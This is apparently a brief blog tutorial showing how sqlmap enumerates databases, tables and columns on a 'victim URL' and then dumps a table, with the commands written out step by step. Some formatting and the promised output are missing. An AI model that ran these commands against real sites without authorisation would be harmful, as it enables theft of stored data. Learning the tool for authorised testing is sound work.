SQL Injection Using SQLmap - [PART 1]
sqlmap -u $url --batch --dbswhere $url is the target url. We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --table -D $databasenameWhere $url is the Victim URL and $databasename is the name of the database. With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablenameWhere $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table. Step 3: The DumpNow that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablenameAnd, we'll get something like this: That's it! I'll be posting again, so stay tuned!Bonus: Here's a list of other popular Google dork queries.
Do you like to write about your infosec knowledge, skills, opinions, or exploits?
Publish your original research, tutorials, articles, or other written content on Cybray's blog to be seen by thousands of infosec readers daily!